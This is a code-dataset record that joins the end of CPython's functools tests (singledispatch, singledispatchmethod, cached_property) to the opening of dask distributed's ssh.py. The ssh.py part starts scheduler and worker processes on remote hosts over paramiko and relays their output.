mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(metaclass=abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.__dict__['add'].__isabstractmethod__)
with self.assertRaises(TypeError):
Abstract()
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_staticmethod_type_ann_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register
@staticmethod
def _(arg: int):
return isinstance(arg, int)
@t.register
@staticmethod
def _(arg: str):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_type_ann_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register
@classmethod
def _(cls, arg: int):
return cls("int")
@t.register
@classmethod
def _(cls, arg: str):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_method_wrapping_attributes(self):
class A:
@functools.singledispatchmethod
def func(self, arg: int) -> str:
"""My function docstring"""
return str(arg)
@functools.singledispatchmethod
@classmethod
def cls_func(cls, arg: int) -> str:
"""My function docstring"""
return str(arg)
@functools.singledispatchmethod
@staticmethod
def static_func(arg: int) -> str:
"""My function docstring"""
return str(arg)
for meth in (
A.func,
A().func,
A.cls_func,
A().cls_func,
A.static_func,
A().static_func
):
with self.subTest(meth=meth):
self.assertEqual(meth.__doc__, 'My function docstring')
self.assertEqual(meth.__annotations__['arg'], int)
self.assertEqual(A.func.__name__, 'func')
self.assertEqual(A().func.__name__, 'func')
self.assertEqual(A.cls_func.__name__, 'cls_func')
self.assertEqual(A().cls_func.__name__, 'cls_func')
self.assertEqual(A.static_func.__name__, 'static_func')
self.assertEqual(A().static_func.__name__, 'static_func')
def test_double_wrapped_methods(self):
def classmethod_friendly_decorator(func):
wrapped = func.__func__
@classmethod
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
return wrapped(*args, **kwargs)
return wrapper
class WithoutSingleDispatch:
@classmethod
@contextlib.contextmanager
def cls_context_manager(cls, arg: int) -> str:
try:
yield str(arg)
finally:
return 'Done'
@classmethod_friendly_decorator
@classmethod
def decorated_classmethod(cls, arg: int) -> str:
return str(arg)
class WithSingleDispatch:
@functools.singledispatchmethod
@classmethod
@contextlib.contextmanager
def cls_context_manager(cls, arg: int) -> str:
"""My function docstring"""
try:
yield str(arg)
finally:
return 'Done'
@functools.singledispatchmethod
@classmethod_friendly_decorator
@classmethod
def decorated_classmethod(cls, arg: int) -> str:
"""My function docstring"""
return str(arg)
# These are sanity checks
# to test the test itself is working as expected
with WithoutSingleDispatch.cls_context_manager(5) as foo:
without_single_dispatch_foo = foo
with WithSingleDispatch.cls_context_manager(5) as foo:
single_dispatch_foo = foo
self.assertEqual(without_single_dispatch_foo, single_dispatch_foo)
self.assertEqual(single_dispatch_foo, '5')
self.assertEqual(
WithoutSingleDispatch.decorated_classmethod(5),
WithSingleDispatch.decorated_classmethod(5)
)
self.assertEqual(WithSingleDispatch.decorated_classmethod(5), '5')
# Behavioural checks now follow
for method_name in ('cls_context_manager', 'decorated_classmethod'):
with self.subTest(method=method_name):
self.assertEqual(
getattr(WithSingleDispatch, method_name).__name__,
getattr(WithoutSingleDispatch, method_name).__name__
)
self.assertEqual(
getattr(WithSingleDispatch(), method_name).__name__,
getattr(WithoutSingleDispatch(), method_name).__name__
)
for meth in (
WithSingleDispatch.cls_context_manager,
WithSingleDispatch().cls_context_manager,
WithSingleDispatch.decorated_classmethod,
WithSingleDispatch().decorated_classmethod
):
with self.subTest(meth=meth):
self.assertEqual(meth.__doc__, 'My function docstring')
self.assertEqual(meth.__annotations__['arg'], int)
self.assertEqual(
WithSingleDispatch.cls_context_manager.__name__,
'cls_context_manager'
)
self.assertEqual(
WithSingleDispatch().cls_context_manager.__name__,
'cls_context_manager'
)
self.assertEqual(
WithSingleDispatch.decorated_classmethod.__name__,
'decorated_classmethod'
)
self.assertEqual(
WithSingleDispatch().decorated_classmethod.__name__,
'decorated_classmethod'
)
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Union[int, typing.Iterable[str]]):
return "Invalid Union"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Union[int, typing.Iterable[str]] not all arguments are classes.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
def test_union(self):
@functools.singledispatch
def f(arg):
return "default"
@f.register
def _(arg: typing.Union[str, bytes]):
return "typing.Union"
@f.register
def _(arg: int | float):
return "types.UnionType"
self.assertEqual(f([]), "default")
self.assertEqual(f(""), "typing.Union")
self.assertEqual(f(b""), "typing.Union")
self.assertEqual(f(1), "types.UnionType")
self.assertEqual(f(1.0), "types.UnionType")
def test_register_genericalias(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int], lambda arg: "types.GenericAlias")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int], lambda arg: "typing.GenericAlias")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int] | str, lambda arg: "types.UnionTypes(types.GenericAlias)")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[float] | bytes, lambda arg: "typing.Union[typing.GenericAlias]")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.Any, lambda arg: "typing.Any")
self.assertEqual(f([1]), "default")
self.assertEqual(f([1.0]), "default")
self.assertEqual(f(""), "default")
self.assertEqual(f(b""), "default")
def test_register_genericalias_decorator(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int])
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int])
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int] | str)
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int] | str)
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.Any)
def test_register_genericalias_annotation(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: list[int]):
return "types.GenericAlias"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.List[float]):
return "typing.GenericAlias"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: list[int] | str):
return "types.UnionType(types.GenericAlias)"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.List[float] | bytes):
return "typing.Union[typing.GenericAlias]"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.Any):
return "typing.Any"
self.assertEqual(f([1]), "default")
self.assertEqual(f([1.0]), "default")
self.assertEqual(f(""), "default")
self.assertEqual(f(b""), "default")
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
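# Illustrative sketch (hypothetical class, not used by the tests below):
# cached_property stores its value in the instance __dict__, which is why
# CachedCostItemWithSlots raises; a class that really needs __slots__ has to
# cache by hand, for example in a dedicated slot.
class _SlottedCostItemWorkaround:
    __slots__ = ('_cost', '_cached_cost')

    def __init__(self):
        self._cost = 1
        self._cached_cost = None

    @property
    def cost(self):
        # Compute once, then keep returning the stored value.
        if self._cached_cost is None:
            self._cost += 1
            self._cached_cost = self._cost
        return self._cached_cost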
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
ssh.py
|
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger('paramiko').setLevel(logging.WARN)
ssh.connect(hostname=cmd_dict['address'],
username=cmd_dict['ssh_username'],
port=cmd_dict['ssh_port'],
key_filename=cmd_dict['ssh_private_key'],
compress=True,
timeout=20,
banner_timeout=20) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException,
PasswordRequiredException) as e:
print('[ dask-ssh ] : ' + bcolors.FAIL +
                  'SSH connection error when connecting to {addr}:{port} '
'to run \'{cmd}\''.format(addr=cmd_dict['address'],
port=cmd_dict['ssh_port'],
cmd=cmd_dict['cmd']) + bcolors.ENDC)
print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print('[ dask-ssh ] : '
+ bcolors.FAIL
+ 'SSH connection failed after 3 retries. Exiting.'
+ bcolors.ENDC)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(' ' + bcolors.FAIL +
'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
bcolors.ENDC)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
cmd=cmd_dict['cmd']))
stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug('stdout from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
output=line))
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug('stderr from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL +
"remote process exited with exit status " +
str(exit_status) + bcolors.ENDC)
return True
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict['input_queue'].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b'\x03') # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
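# async_ssh() is driven entirely by the dict it receives: it reads 'address',
# 'ssh_username', 'ssh_port', 'ssh_private_key', 'cmd' and 'label', streams the
# remote output into 'output_queue', and shuts the connection down once anything
# is put on 'input_queue'. start_scheduler() and start_worker() below build such
# dicts and run async_ssh() in a daemon thread.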
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
python=remote_python or sys.executable, port=port, logdir=logdir)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
port=port, logdir=logdir)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (bcolors.BOLD +
'scheduler {addr}:{port}'.format(addr=addr, port=port) +
bcolors.ENDC)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
ssh_username, ssh_port, ssh_private_key, nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker='distributed.cli.dask_worker'):
cmd = ('{python} -m {remote_dask_worker} '
'{scheduler_addr}:{scheduler_port} '
           '--nthreads {nthreads} '
           + ('--nprocs {nprocs} ' if nprocs != 1 else ''))
if not nohost:
cmd += ' --host {worker_addr} '
if memory_limit:
cmd += '--memory-limit {memory_limit} '
if worker_port:
cmd += '--worker-port {worker_port} '
if nanny_port:
cmd += '--nanny-port {nanny_port} '
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}.log'.format(
addr=worker_addr, logdir=logdir)
label = 'worker {addr}'.format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
ssh_username=None, ssh_port=22, ssh_private_key=None,
nohost=False, logdir=None, remote_python=None,
memory_limit=None, worker_port=None, nanny_port=None,
remote_dask_worker='distributed.cli.dask_worker'):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
